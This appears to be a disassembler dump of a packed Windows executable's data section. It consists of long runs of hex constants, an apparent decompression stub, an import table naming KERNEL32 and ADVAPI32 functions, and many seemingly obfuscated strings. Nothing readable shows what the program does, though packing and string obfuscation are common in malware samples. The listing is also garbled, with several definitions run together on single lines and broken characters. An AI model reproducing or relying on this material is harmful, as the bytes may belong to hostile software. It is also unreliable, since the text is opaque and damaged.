dd 81F46D93h, 43037759h, 97D75860h, 0C33490C1h, 0AF4476CCh
dd 3B21D9B0h, 0EC98AF6Dh, 9A401AA3h, 75095C00h, 84683DECh
dd 0B75D4E15h, 161C90EDh, 3B0A264Ah, 9A69362Eh, 0F29B08B1h
dd 6DF30CDEh, 2901C90Ch, 0A7581B0Dh, 0DB933491h, 473DDBEFh
dd 0E944C298h, 308DF586h, 69CF0E44h, 992A2D16h, 5314E30Ch
dd 0B8DDC075h, 60140773h, 75727E80h, 2ED21A4Eh, 398756E8h
dd 7495D233h, 0CA0C7930h, 0C048C4B1h, 6F4DB94Dh, 167AB7F7h
dd 58EC588Bh, 0FFE38110h, 0B8C4C0Fh, 6F750806h, 7E0C9B1Bh
dd 4A47D103h, 0F56B1ED2h, 147EE82Dh, 0C61689B9h, 0B85A9246h
dd 53B78FDh, 3EB1454h, 4948C8DEh, 235C1976h, 1925A75h
dd 2A3A1058h, 366FB76Bh, 754FFC8Ch, 796683EAh, 19866680h
dd 1B5024B6h, 3C17C252h, 17C4B618h, 3956BA02h, 1871105Dh
dd 7D9F2BCBh, 83E34C1h, 718B08CEh, 759CDF45h, 0D375615Dh
dd 5814D214h, 751C5938h, 6DBB5B50h, 5D1D41C1h, 804CEF8h
dd 6A976FDFh, 1450F3CEh, 0F8550148h, 5AD2D33Bh, 0C84E476Bh
dd 139418EBh, 0D4230CEAh, 0B6EFA5A6h, 0EBB3FFFAh, 2139D3CAh
dd 0FDFA8F14h, 4056F61h, 16D641C6h, 50646F6h, 5BEB0CDCh
dd 4A878AE7h, 56E48EF8h, 0E6E5C060h, 14A86C5Ah, 89AAADE1h
dd 0DDB2AF00h, 8B2D6B77h, 0A5F33B36h, 0EB3C7C74h, 4B77EDCFh
dd 3D743E75h, 77147255h, 29C28B02h, 0BB76E06h, 13D02BDFh
dd 0A4EB9704h, 1BA0744Dh, 172B7610h, 4EFD686h, 3DD2F3DBh
dd 368DB6Bh, 0CD4D9ADh, 1229CB27h, 18AB9AB4h, 202CC22Ah
dd 86DABB48h, 37110115h, 0B54B4E86h, 0CAAAC243h, 46658714h
dd 0BDAB1F6Fh, 59066A57h, 56FE8B14h, 10E340B8h, 0D2991B4h
dd 0CD6ACC2Dh, 6DC4A3EEh, 156614A0h, 12B302B6h, 241E088h
dd 50D75062h, 29C533Ch, 6FCC0CEEh, 7E8D1EFEh, 1FD06608h
dd 465459C0h, 568AE8EBh, 7ADB8069h, 0E52ECE0Fh, 0E7BD3114h
dd 61DD6CCh, 6820F454h, 642DD81Eh, 619DB0CFh, 6500101Dh
dd 4036A91Ah, 0BDEE5A55h, 462D54B4h, 0FE34FD6Fh, 8CA02CB7h
dd 0F39FF98Ch, 54D6ED6Fh, 0F9D19AB8h, 0DA75273Fh, 78EC03Eh
dd 513C5F82h, 0D4B85393h, 37170E42h, 0BC575BABh, 721B6ABAh
dd 87B249BEh, 3F736DFh, 0F9190B68h, 20B1FC0h, 46473C8Ch
dd 0C800D2C4h, 0FC18888Eh, 0CB85CC8Ch, 0C68DED02h, 36B3F803h
dd 1A24C19Ch, 61B456Ch, 1781BD63h, 27D19A3Fh, 7E4D7701h
dd 908B4298h, 0BD40B06Fh, 830C33FBh, 0E9F714C1h, 0A8F1B6CDh
dd 0F458853h, 3314756Eh, 7DB38447h, 4D8A7447h, 32A4170Fh
dd 7031F620h, 0B1AE6225h, 6BED052h, 646D80B8h, 0A38109B3h
dd 0B2701F29h, 7982FB1Dh, 0CE49E80Ch, 94BE43D1h, 5B535241h
dd 55746A70h, 0B1B9E0A4h, 9E147E08h, 6D5BBAF8h, 0C4201CD0h
dd 23F61122h, 2B762060h, 0D8C7E0E8h, 80180305h, 1E89EF17h
dd 0F02F6CE5h, 8E9076C0h, 0B771FB3Bh, 247B7D1h, 8F7BE39Ah
dd 9F8B2B54h, 97CCFD5Ah, 887880Ch, 0D83B0B02h, 351EF012h
dd 19EA2223h, 64D42846h, 1AF54BECh, 424C22F3h, 531F8021h
dd 735B3320h, 96830111h, 819C0885h, 1C068158h, 16D1D043h
dd 4D99B362h, 0D4BD1E4Bh, 46464646h, 0DC94D8FCh, 46F6161Fh
dd 0A5CBB30Dh, 0EFBD8D69h, 0C78BBF61h, 8BC54D89h, 5BBBF18h
dd 0A25781A3h, 0EC65CC7Eh, 9411A508h, 37893DCAh, 9D6F263Eh
dd 1A496C1Bh, 0B602EC0Fh, 0AB6831FFh, 61135B3h, 0FFF04150h
dd 0FB6C5EF7h, 0A2278303h, 0A559F093h, 88403FBFh, 53ABB739h
dd 0FFFFFE1Ah, 21B30833h, 249F4A8Ah, 43850A90h, 0C64657E9h
dd 0B054212Dh, 171F99EBh, 970E016Dh, 6D3F88B2h, 1E3A3175h
dd 898A4805h, 516CC689h, 8BF54848h, 7992FFEDh, 0BF0246E2h
dd 30306B38h, 0EE6BD78Ah, 5063435h, 768A810Ch, 0CF0AD939h
dd 3F3BB3Ch, 0E11C231Ch, 0FE565ADEh, 0A3AC6A05h, 933B7593h
dd 1B3140A1h, 0B451329h, 14A30820h, 0FBAD46CEh, 234BC38Bh
dd 3CA692C1h, 0A1367014h, 0FBC3946Ch, 42B66C2Eh, 0A1728AE7h
dd 0DA043D8Ah, 0F6C4CD86h, 8B8AD04Bh, 6054F2h, 655CE133h
dd 806FC34Ah, 90494C35h, 0D9884D38h, 0C7DE27B0h, 30234E06h
dd 660F73Fh, 0F5528101h, 18363C05h, 45C72011h, 3240C362h
dd 0F48880C0h, 0EBA21A4Ch, 8C47C7B0h, 83659159h, 1C4D6C12h
dd 2F6D872h, 3C740F0Ah, 0DAB3C212h, 0E106B57h, 0E03CCD96h
dd 74F8083h, 1E0E85D8h, 7B830B4Dh, 8540B94h, 8F547C0Fh
dd 0E7931EE8h, 1BBBBE2Dh, 35750252h, 19741005h, 831247F6h
dd 9E00BD0Bh, 5C6A1075h, 0C530087Bh, 66BBB86Ah, 758FA7F3h
dd 539A570Ah, 163145Ah, 570228C0h, 0B2585232h, 0D0D12961h
dd 39D37B2Ch, 7401D0C6h, 0CC868B71h, 4BEC6419h, 8D534F27h
dd 86CBCD9Eh, 19192190h, 0EF86868Eh, 960E464Eh, 1545BCBh
dd 0B1571375h, 56AC5D25h, 0AB04ACB6h, 5428E6E7h, 0CC057B01h
dd 91919102h, 0DCC4C891h, 919191BCh, 0C0B4B891h, 919981D0h
dd 0E0D8D491h, 0C9452800h, 0E200FFC8h, 9EE886EDh, 0BAE904h
dd 235686F0h, 2170BFC2h, 0BA01FB36h, 8B0E5A4Dh, 0C6033C70h
dd 1C8DB454h, 100641BCh, 0C2D16F00h, 0EB386ED7h, 1635EE0h
dd 0BADD221Ah, 901426FCh, 0F17C0B17h, 7D7A4A76h, 0E87F071Dh
dd 37FFADEh, 8A188AC2h, 751E3ACBh, 30C9841Ah, 0C01588Ah
dd 15BB715Eh, 46905D50h, 0E2751146h, 7605A3FFh, 401B05CFh
dd 831B4FD8h, 83022045h, 8B42A681h, 96723CC7h, 57C5FC3Bh
dd 0BC727AB3h, 20EE4A33h, 8FF06A2Dh, 0B70F0CADh, 8DF22B00h
dd 82D4455Dh, 630B5B8h, 0AA4EDF81h, 53FA2BDAh, 6164410Ch
dd 0C8003170h, 13F452B5h, 0D60F0403h, 3BA5FB0Eh, 6F636F74h
dd 1244176Ch, 0F4533019h, 42671752h, 0C16778F1h, 94D55677h
dd 0EBC4B4Dh, 2BBEC648h, 0CA94091h, 2A02811Dh, 87F4E456h
dd 0B0BED557h, 16387870h, 0ECF20320h, 2D0B157Ah, 8B244E75h
dd 0FA74032Ch, 0DFA3A05Dh, 0FEC5DB0h, 3F53C320h, 220F4FFFh
dd 6B621601h, 20510F48h, 4BD45076h, 9E9E56C1h, 2D346883h
dd 3EA96A38h, 311A57DAh, 0F3481CA3h, 205D12B0h, 20481694h
dd 141C85CFh, 7C8760C2h, 0EC187217h, 47A37862h, 3E50CEB3h
dd 88895B92h, 5E2B66B5h, 1227105h, 0DE210E23h, 745FFB67h
dd 0E91807F1h, 63BB2FA1h, 95C76F14h, 3D24053Fh, 5BF7505Ch
dd 454400D1h, 690076h, 895C0763h, 876DDDC2h, 730B64h, 0D7AE0772h
dd 611B9B75h
dd 1D6D030Bh, 1B720374h, 203C5D63h, 3B558CDFh, 8DC11763h
dd 6E651F74h, 7D179B21h, 49506DCFh, 752EDh, 0B6426F63h
dd 6937CC0Dh, 0B3275C0Dh, 0A9119440h, 3218866Ch, 0F0D0BDB4h
dd 2EA8685Ch, 0E25E5009h, 0DA186809h, 2153B281h, 5606D4F7h
dd 1C4B5012h, 865A2826h, 8308E25Ah, 0F6ADDA95h, 70D85B7h
dd 22C4AA58h, 5153944Dh, 6F3BFC68h, 9476D6EEh, 9C889820h
dd 0B0060DC8h, 0E46206FEh, 14B43EE6h, 0E0B8142Fh, 0DB2DB6C0h
dd 0CC288FF6h, 57D4D002h, 880C7E20h, 68E83EE6h, 79402F0Ch
dd 0C41B2F73h, 1E241816h, 6A38568Bh, 0E21501DEh, 46FA8B1Bh
dd 1AB859A1h, 6F0DE007h, 0B8F716D1h, 5E920920h, 70028934h
dd 0F25E8BF5h, 4B868940h, 63547846h, 0FA22C115h, 0CEFFB894h
dd 687447EEh, 6CA30458h, 0B8D6FF0Eh, 0F3C88648h, 4C50157Ch
dd 0F41CEA48h, 6A53C1D0h, 0ECF329CCh, 3D736F4Dh, 96595183h
dd 34402FF3h, 51F1F068h, 0AC4F076h, 0A012F098h, 53140D0Fh
dd 0D97A32D4h, 12D84A06h, 301330CCh, 1D65E533h, 30E0C303h
dd 2A345644h, 0B4C9A030h, 64FD2B02h, 1C81F50h, 53D3654Bh
dd 4C6E6970h, 51ADEA0Ch, 1211774h, 0AEFEFB49h, 7953FEDDh
dd 1C6F626Dh, 171A4C63h, 74520394h, 8975516Ch, 0DB6B36Ah
dd 61074979h, 0ED925508h, 431B3173h, 0B677A895h, 565C642Bh
dd 6DAD542Bh, 2D496450h, 0AA6B2916h, 669566FEh, 706D6F43h
dd 7164656Ch, 1B92DB3Eh, 0F7F395h, 0C6C06342h, 5A4A68A0h
dd 0F6B517FAh, 6E49F24Dh, 3C455D37h, 0FAA1257Eh, 2D75E85h
dd 6B957350h, 27B3B09Fh, 6F5422BDh, 8D1B6E41h, 0E65176Bh
dd 644DEA33h, 0B6C7BFF2h, 4D024E7Eh, 4CEC4D6Dh, 6761506Bh
dd 0A802BAD7h, 4FE07B9Ah, 661E6662h, 585E7E03h, 17D44DB3h
dd 421452B5h, 0CEDAA179h, 14541AAh, 0C355EE78h, 5417D9F6h
dd 0F9137079h, 0FF955369h, 1A05186Dh, 726B736Fh, 652E6C6Eh
dd 0D6E12E78h, 664BB536h, 7361384Bh, 73364F82h, 4113EFC9h
dd 69757163h, 77085072h, 0DEDB42EDh, 71724973h, 3E0D48ADh
dd 0BB336961h, 0D7B70B6h, 0A37044D4h, 41175D65h, 7C08B14Ch
dd 0C1749551h, 6764B5DBh, 1176AD55h, 0A95B22DCh, 5074E2DAh
dd 0CC27158Bh, 0FEA870DDh, 667542BDh, 81C819D4h, 332CE425h
dd 0E496029h, 45725F4Bh, 6DEA8D0Ch, 63724100h, 0F685C5BDh
dd 0BAA3D6DAh, 0EF33226Eh, 0BC2AAB36h, 0AE69B7h, 0A033011Fh
dd 0CF6C3DE4h, 4136E55Ah, 256F4274h, 2D92B726h, 2B959980h
dd 8DDD662Bh, 70566548h, 156D3C79h, 15876422h, 0F9751D14h
dd 891F491Ah, 59532E0Dh, 4AC8A153h, 8901D5F1h, 2D17B618h
dd 1E69007h, 48041930h, 14B2C95Bh, 1304C04Fh, 53C0D743h
dd 5F9D56B4h, 0CDED4505h, 5340D034h, 5FB34FABh, 0FE788B05h
dd 4F0B46B9h, 0FEEF04BDh, 26C36D03h, 75D452Bh, 0B4EF473Fh
dd 19017210h, 1D733163h, 744F6C34h, 6735697Bh, 839B074Dh
dd 0D6C61AEh, 2B660D49h, 0B1BC4023h, 34B93BAEh, 62073903h
dd 75D064C7h, 171E751Dh, 736D2343h, 0C80D14B0h, 61812073h
dd 7418C188h, 20AF6B61h, 0F74D339Bh, 6307D13Dh, 79206F11h
dd 0E0C43D92h, 1407CF76h, 0DC0CC153h, 79533DF6h, 375DF34Fh
dd 54CF9DD6h, 6E2D4B33h, 520D6C05h, 7BAE066h, 137531C3h
dd 0E61D8DCFh, 4715119Eh, 631544CBh, 8DD74494h, 69797069h
dd 5B1F6E2Dh, 49B6F759h, 65215168h, 89055399h, 36B901h
dd 5881560Bh, 4B971C2Bh, 585EF32h, 0C8D8F307h, 2E373135h
dd 0C44F0700h, 74B06665h, 6ED561B7h, 90B6EBAFh, 2F2971E7h
dd 29671B4Ch, 0EEB1B84h, 8D79930Dh, 1021A367h, 13D9ECAEh
dd 0EB061B20h, 15A9BA1Ah, 530BF32h, 6233092Dh, 9B8ACEC2h
dd 3054770Ch, 6DC62F0Dh, 72C75164h, 0B38F7426h, 7D29576Fh
dd 8D830B6Bh, 1FD5CC34h, 69934F3Eh, 66126C09h, 0EF6E2FE7h
dd 0BAC1A461h, 5779072Eh, 75500D20h, 6C6E7C7h, 0B9425761h
dd 0C46F643Fh, 5C48BEE8h, 750F6F1Fh, 8CA2EF43h, 3A774525h
dd 212308BBh, 0DFE15B64h, 46CEE7DEh, 5F7553B7h, 61D2F569h
dd 44B7C26Ch, 5D43561Fh, 56E88709h, 6D842400h, 0B6E8C27Ah
dd 611F7315h, 0B00409A3h, 0CD90337Fh, 80A80315h, 0D034C433h
dd 0D55BDF34h, 0EE34FFFFh, 1B350F34h, 39352A35h, 0D135A635h
dd 0E035D735h, 6FFA32A7h, 6B36FF55h, 9B368A36h, 1099A436h
dd 1C378A37h, 0FF384638h, 3A17FFFFh, 38C3385Fh, 38FE38E2h
dd 39383928h, 394B3945h, 39B63965h, 39E639D3h, 0FFFF39F9h
dd 3A39FFFFh, 3A473A40h, 3A553A4Eh, 3A633A5Ch, 3A713A6Ah
dd 3A903A78h, 3AA83A9Fh, 3AF43AB1h, 0FFFF3B08h, 3B10FFFFh
dd 3B763B15h, 3C0C3B7Eh, 3C8C3C72h, 3D093C9Fh, 3DB03D31h
dd 3E3A3DB9h, 3E973E80h, 0AF8B3E9Eh, 3EBEFFFFh, 3F353F04h
dd 3F623F4Ch, 3F7D3F6Eh, 84F93FF0h, 0FFF27B10h, 20C066FFh
dd 11310530h, 39312A31h, 78316C31h, 98318931h, 2320C31h
dd 23FFFFC0h, 44332B33h, 0E333C233h, 13340B33h, 29341834h
dd 0FFDDFF8Fh, 0C13458FFh, 0FB34F334h, 29352134h, 81352E35h
dd 0E5CB8935h, 0FD35F335h, 23361635h, 0FFF77F46h, 39363036h
dd 58364136h, 82367C36h, 0DD36BADBh, 53384E36h, 0FFFFFF0Eh
dd 387D38FFh, 38B13890h, 39B1393Eh, 3A223A17h, 3A683A5Eh
dd 3AE83AC6h, 3B283B1Dh, 3B853B7Ch, 0FFFBBFB7h, 3C073BFEh
dd 3C703C68h, 3C803C76h, 3CE7B988h, 3D5D3D50h, 453E2E34h
dd 0FFFFFFFEh, 503E4A3Eh, 6E3E573Eh, 0CD3E783Eh, 613EDE3Eh
dd 853F6C3Fh, 0BF3F933Fh, 0DB3FCA3Fh, 0FF3FE93Fh, 0E81EEFFFh
dd 304CBFF4h, 30D93089h, 30F630DEh, 313A30FDh, 315B3141h
dd 2F103164h, 3194FFF4h, 31A8319Fh, 31F231ADh, 353F31F8h
dd 0FE1B1632h, 0C39E1ADFh, 34BA34AAh, 34D734CBh, 8D203508h
dd 3780356Eh, 3586FE00h, 35A535A0h, 37482778h, 0EDF00076h
dd 380E0F0Dh, 5038A72Ch, 0B7FF6838h, 0CB51BFFFh, 19391438h
dd 26392039h, 34392C39h, 39610039h, 39853976h, 399F398Dh
dd 0EE0B001Bh, 0CBAC39A7h, 0ED17D099h, 0FD5BFE00h, 0FA39F539h
dd 3A4BFF39h, 3A183A10h, 0FF743A1Eh, 1937FFFFh, 3B423AB3h
dd 3B813B73h, 3BAE3BA8h, 3BBA3BB4h, 3BC63BC0h, 3BD23BCCh
dd 2FFF3BD8h, 3BDEFFFDh, 3BEA3BE4h, 3DA23BF0h, 3DF33DEEh
dd 143E0FA0h, 303E213Eh, 423E353Eh, 0FFFFC006h, 563E513Eh
dd 723E603Eh, 893E813Eh, 3D3E903Eh, 0C02B473Fh, 83F001BFh
dd 0A629913Fh, 0C43FBC3Fh, 19FFD53Fh, 0F32D06DBh, 15DF30F3h
dd 1F301A30h, 0F8242430h, 2930EDB7h, 0F5350030h, 65303F30h
dd 1F306A30h, 9EC7E6h, 4931424Eh, 40601997h, 1A2FA06h
dd 4473458Dh, 49FE73F8h, 706802ECh, 3220FB6Bh, 4B5C302Eh
dd 809E268Bh, 5C775C17h, 120F4F0h, 64705505h, 95C4B162h
dd 0AA4EA704h, 0D43BFE77h, 42095A6Ah, 6174536Bh, 5307472h
dd 72476F9Ch, 0D670756Fh, 0A41780Ah, 82C11FACh, 0D7347405h
dd 50167618h, 0D55C7643h, 205B6E73h, 0D7000D01h, 1ED709Fh
dd 6F977EDEh, 1D00BA1Dh, 903E08F6h, 575D155Ch, 4640323Ch
dd 0FB590660h, 2A1F4523h, 0F6338008h, 177EFF85h, 15197F18h
dd 1E285C66h, 7CF73B46h, 0F30AA423h, 3B2480E9h, 4362FEE0h
dd 40101CF2h, 0C131800h, 61765468h, 73C6C9BEh, 0E6A1114h
dd 813E4810h, 1028E054h
dd 0C2A90040h, 1448EE74h, 0E7E04C1Bh, 5660A306h, 90F54C6h
dd 5AF736A3h, 20054910h, 9C4F4004h, 67FB6405h, 20345931h
dd 4C9C64BDh, 0BE57F6C9h, 0C6A49C9Ch, 0A481CF25h, 0F7D068C0h
dd 0D8799Fh, 683A6816h, 0BE0A6ABBh, 0F3482394h, 8D597FDDh
dd 0A5F3AC7Dh, 0B84BEA4h, 0A5D87D8Dh, 0B19E7CA5h, 0F5F0C11Bh
dd 0E80A74BEh, 76EBB76Ch, 0E4A5F847h, 0A40B6468h, 99BEACE6h
dd 553E205Dh, 0C1692480h, 0B0016A7Bh, 14EC7457h, 35196A0Fh
dd 9E2350Fh, 831FF89Bh, 61C94CC4h, 0E19CCD92h, 6AF8DF08h
dd 6CD437F5h, 400544A6h, 0F80D4A9h, 0F7617385h, 0EFBCBE9Dh
dd 96F26604h, 0F7BAFF00h, 0C64420Eh, 14EC358Bh, 6767F4FEh
dd 1AD64630h, 47831903h, 0C2EEBF78h, 3C305204h, 1105842Ah
dd 6159010Eh, 1E67D98Bh, 39EC6859h, 1342A20h, 0F3C868h
dd 0AD7210FFh, 13DE1A7Ch, 0EA60385Ah, 74C3640Ah, 76E0349Fh
dd 30AFD404h, 0EFEF112Eh, 8D047B2Ch, 0FF68D68Dh, 562898D0h
dd 1DEFBF0Ah, 6C51204Dh, 0B55FBBh, 0C0968B59h, 962A3635h
dd 144876A7h, 570950DDh, 2D1E04B6h, 27D8DEAh, 80EFF33h
dd 0B45420F9h, 575DB023h, 57B01D24h, 2057359h, 0CC51h
dd 0A0286016h, 41101B70h, 3C61019Ch, 0C4061801h, 44015C21h
dd 80C03100h, 0BA0ABA42h, 773E9384h, 310400F9h, 0A6922030h
dd 57908824h, 88040155h, 10B2031h, 2090E292h, 1D4010Eh
dd 0B2C40656h, 20904C04h, 6D3EE606h, 1212F125h, 41168844h
dd 0D25CD830h, 0B27B7DE3h, 4456460Ah, 5580B667h, 8A368510h
dd 69C443ECh, 7301315Ch, 165F2006h, 10C54h, 0E12F20F2h
dd 6E010F79h, 0B078D565h, 80C122A0h, 5810CE2h, 21F8DF5h
dd 0E054840Ch, 837A744Eh, 41957ACh, 96046817h, 0B05F5059h
dd 2EB906Ch, 206C510Ch, 7B2CFD48h, 0BC000000h, 71BFh, 1200h
dd 0BE6000FFh, 406000h, 0B000BE8Dh, 8357FFFFh, 10EBFFCDh
dd 90909090h, 68A9090h, 47078846h, 775DB01h, 0EE831E8Bh
dd 72DB11FCh, 1B8EDh, 0DB010000h, 1E8B0775h, 11FCEE83h
dd 1C011DBh, 75EF73DBh, 831E8B09h, 0DB11FCEEh, 0C931E473h
dd 7203E883h, 8E0C10Dh, 8346068Ah, 7474FFF0h, 0DB01C589h
dd 1E8B0775h, 11FCEE83h, 1C911DBh, 8B0775DBh, 0FCEE831Eh
dd 0C911DB11h, 1412075h, 8B0775DBh, 0FCEE831Eh, 0C911DB11h
dd 0EF73DB01h, 1E8B0975h, 11FCEE83h, 83E473DBh, 0FD8102C1h
dd 0FFFFF300h, 8D01D183h, 0FD832F14h, 8A0F76FCh, 7884202h
dd 0F7754947h, 0FFFF63E9h, 28B90FFh, 8904C283h, 4C78307h
dd 7704E983h, 0E9CF01F1h, 0FFFFFF4Ch, 0B9F7895Eh, 11Ah
dd 2C47078Ah, 77013CE8h, 43F80F7h, 78BF275h, 66045F8Ah
dd 0C108E8C1h, 0C48610C0h, 0EB80F829h, 89F001E8h, 5C78307h
dd 0D9E2D889h, 7000BE8Dh, 78B0000h, 3C74C009h, 8D045F8Bh
dd 90003084h, 0F3010000h, 8C78350h, 905096FFh, 8A950000h
dd 0C0084707h, 0F989DC74h, 0AEF24857h, 5496FF55h, 9000090h
dd 890774C0h, 4C38303h, 96FFE1EBh, 9058h, 0DF61E961h, 0FFFFh
dd 25h dup(0)
dd 0A0700000h, 0A0500000h, 3 dup(0)
dd 0A07D0000h, 0A0600000h, 3 dup(0)
dd 0A08A0000h, 0A0680000h, 5 dup(0)
dd 0A0940000h, 0A0A20000h, 0A0B20000h, 0
dd 0A0C00000h, 0
dd 0A0CE0000h, 0
dd 454B0000h, 4C454E52h, 442E3233h, 41004C4Ch, 50415644h
dd 2E323349h, 6C6C64h, 4356534Dh, 642E5452h, 6C6Ch, 64616F4Ch
dd 7262694Ch, 41797261h, 65470000h, 6F725074h, 64644163h
dd 73736572h, 78450000h, 72507469h, 7365636Fh, 73h, 43676552h
dd 65736F6Ch, 79654Bh, 61720000h, 646Eh, 4Bh dup(0)
dd 2, 0Ah
dword_446458 dd 0 ; sub_4082AB:loc_4082D9�r ...
dword_44645C dd 56306Fh dword_446460 dd 625C3A63h, 2E746F6Fh, 737973hbyte_44646C db 72h, 49h, 0 ; DATA XREF: sub_40844F+3A�o
byte_44646F db 50h ; DATA XREF: sub_40844F+A6�o
dd 82707F6Dh
db 66h, 25h, 0
byte_446477 db 4Bh ; DATA XREF: sub_40844F+B9�o
dd 48h
dword_44647C dd 11h, 0Fh dup(0)dword_4464BC dd 0E1F7EEA5h, 0BFFD7E2Ch, 869AE87Fh, 0CC244082h, 0D76ADDE2h
; DATA XREF: sub_408741+10�o
dd 1B77E1E1h, 505215B0h, 0D24B6456h, 3D357C6Bh, 280E85D5h
dd 1AB051F9h, 1E4E8744h, 0E383CCDFh, 323D4737h, 14F80518h
dd 6E0637BFh, 8, 0Ah
dword_446504 dd 0 ; .text:loc_4085D4�r ...
dd 3
dword_44650C dd 0Eh dword_446510 dd 0 ; .text:loc_4086D3�r ...
dword_446514 dd 57384020h db 5Ah, 0
dword_44651A dd 20374Bh word_44651E dw 574Fh ; DATA XREF: sub_408779+77�o
db 0
word_446521 dw 30h ; DATA XREF: sub_408779:loc_40882F�r
align 4
dd 5, 0Ah
dword_44652C dd 0 ; .text:loc_4088DE�r ...
aVlvh__0 db 'vlVh_',0 ; DATA XREF: sub_40893E+11�o
align 4
dword_446538 dd 0FFFFFFFFh dd 2Ah dup(0FFFFFFFFh), 3Eh, 3 dup(0FFFFFFFFh), 3Fh, 34h
dd 35h, 36h, 37h, 38h, 39h, 3Ah, 3Bh, 3Ch, 3Dh, 7 dup(0FFFFFFFFh)
dd 0
dd 1, 2, 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Ch, 0Dh, 0Eh
dd 0Fh, 10h, 11h, 12h, 13h, 14h, 15h, 16h, 17h, 18h, 19h
dd 6 dup(0FFFFFFFFh), 1Ah, 1Bh, 1Ch, 1Dh, 1Eh, 1Fh, 20h
dd 21h, 22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 2Ah, 2Bh
dd 2Ch, 2Dh, 2Eh, 2Fh, 30h, 31h, 32h, 33h, 85h dup(0FFFFFFFFh)
dword_446938 dd 7568203Ah db 0
byte_44693D db 2Fh, 31h, 81h ; DATA XREF: sub_40893E+9D�o
dd 3A546F7Eh
db 0
byte_446945 db 3 dup(0) ; DATA XREF: sub_40893E+F1�o
off_446948 dd offset loc_4089D5 ; DATA XREF: sub_40893E+88�r
dd offset loc_4089E8
dd offset loc_408A13
dd offset loc_408A4A
dword_446958 dd 7 dd 0Ah
dword_446960 dd 0 ; sub_408AB9:loc_408AE8�r ...
dword_446964 dd 2B5240h word_446968 dw 41h ; DATA XREF: sub_408B4C+B8�r
word_44696A dw 3B2Dh ; DATA XREF: sub_408B4C+14B�o
dd 61393920h
db 0
dword_446971 dd 505866h dword_446975 dd 505E55h byte_446979 db 3Bh, 27h, 2Ah ; DATA XREF: sub_408E12+16�o
dd 2026206Ch
db 0
aHjvmnia db 'hJVmnIA',0 ; DATA XREF: sub_408E12+61�o
aP_rX db 'p+_R',27h,'X',0 ; DATA XREF: sub_408E12+A7�o
aFxTE db 'fX $t!E',0 ; DATA XREF: sub_408ED0+E7�o
aQa db 'qA',0 ; DATA XREF: sub_408ED0+207�o
byte_44699B db 0 ; DATA XREF: sub_408ED0+31B�o
aZ_y9am4 db 'z.y9aM4',0 ; DATA XREF: sub_408ED0+63B�o
a3h db '3h',0 ; DATA XREF: sub_408ED0+739�o
aOi6 db ' oi%6',0 ; DATA XREF: sub_408ED0+827�o
dword_4469AD dd 2E3B72h byte_4469B1 db 40h, 47h, 44h ; DATA XREF: sub_408ED0+866�o
dd 214E2075h
db 0
byte_4469B9 db 47h, 21h, 5Fh ; DATA XREF: sub_408ED0+8BE�o
db 60h, 0
word_4469BE dw 4E7Fh ; DATA XREF: sub_408ED0+92F�o
dd 307F7Ch
word_4469C4 dw 7Fh ; DATA XREF: sub_4098A8+15�r
word_4469C6 dw 4732h ; DATA XREF: sub_4098A8+28�o
dd 66213C54h
db 0
byte_4469CD db 4Eh, 4Ah, 62h ; DATA XREF: sub_4098A8+3B�o
dd 397320h
byte_4469D4 db 0 ; DATA XREF: sub_4098A8+4E�o
dword_4469D5 dd 4A7180h byte_4469D9 db 2Eh, 20h, 33h ; DATA XREF: sub_4098A8+6A�o
db 82h, 0
byte_4469DE db 0 ; DATA XREF: sub_4098A8+99�o
byte_4469DF db 3Ch ; DATA XREF: sub_4098A8+107�o
dd 792B6973h
db 59h, 0
byte_4469E6 db 0 ; DATA XREF: sub_4098A8+1A7�o
byte_4469E7 db 2Ah ; DATA XREF: sub_4098A8+20B�o
db 2Fh, 0
aOcqud db 'ocqUd',0 ; DATA XREF: sub_4098A8+367�o
word_4469F0 dw 68h ; DATA XREF: sub_4098A8:loc_409C42�r
word_4469F2 dw 6Dh ; DATA XREF: sub_4098A8+3F3�r
dword_4469F4 dd 39572Ch dword_4469F8 dd 81243B4Dh, 64373Ahdword_446A00 dd 4E314Fh dword_446A04 dd 36307F57h db 6Ch, 61h, 0
byte_446A0B db 55h ; DATA XREF: sub_4098A8+833�o
dd 277C57h
dword_446A10 dd 203D3A3Eh, 325020hdword_446A18 dd 6A2082h dword_446A1C dd 71243A5Eh db 0
dword_446A21 dd 384E42h dword_446A25 dd 6C3020h byte_446A29 db 0 ; DATA XREF: sub_4098A8+D04�o
word_446A2A dw 7Eh ; DATA XREF: sub_4098A8+DB4�r
dword_446A2C dd 674E5F56h db 76h, 2Bh, 0
dword_446A33 dd 3F3C45h byte_446A37 db 0 ; DATA XREF: sub_4098A8+10ED�o
word_446A38 dw 4Eh ; DATA XREF: sub_40AA24+1B�r
dword_446A3A dd 4D2065h word_446A3E dw 8020h ; DATA XREF: sub_40AA24+1E9�o
db 83h, 39h, 0
byte_446A43 db 44h ; DATA XREF: sub_40AA24+23F�o
dd 79805570h
db 59h, 46h, 0
aWq6ug db 'wq6Ug',0 ; DATA XREF: sub_40AA24+24D�o
aRf db 'rf',0 ; DATA XREF: sub_40AA24+325�o
word_446A54 dw 42h ; DATA XREF: sub_40AA24+364�r
word_446A56 dw 3631h ; DATA XREF: sub_40AA24+540�o
dd 69593C58h
db 5Fh, 0
dword_446A5E dd 6B3377h word_446A62 dw 3E49h ; DATA XREF: sub_40AA24+62A�o
dd 20207F55h
db 0
byte_446A69 db 40h, 7Ch, 0 ; DATA XREF: sub_40AA24+6AD�o
dword_446A6C dd 40482480h, 556432hword_446A74 dw 26h ; DATA XREF: sub_40AA24+759�r
word_446A76 dw 5A42h ; DATA XREF: sub_40AA24+78C�o
db 0
byte_446A79 db 80h, 40h, 0 ; DATA XREF: sub_40AA24+862�o
dword_446A7C dd 2F206Dh dword_446A80 dd 23302Fh dword_446A84 dd 36627C70h db 0
off_446A89 dd offset byte_444E5F ; DATA XREF: sub_40B3E8+188�r
byte_446A8D db 20h, 2Ah, 80h ; DATA XREF: sub_40B3E8+304�o
dd 71802668h
db 0
aGjvry db 'gjVRy',0 ; DATA XREF: sub_40B3E8+327�o
dword_446A9B dd 387547h byte_446A9F db 72h ; DATA XREF: sub_40B3E8+486�o
db 20h, 0
dword_446AA2 dd 20762Bh word_446AA6 dw 773Bh ; DATA XREF: sub_40B3E8+68B�o
db 0
word_446AA9 dw 2Dh ; DATA XREF: sub_40B3E8+724�r
byte_446AAB db 2Bh ; DATA XREF: sub_40B3E8+7B8�o
dd 7F4A5Eh
dword_446AB0 dd 637A4076h, 0 byte_446AB8 db 0D4h, 0 ; DATA XREF: sub_40B3E8+7C7�o
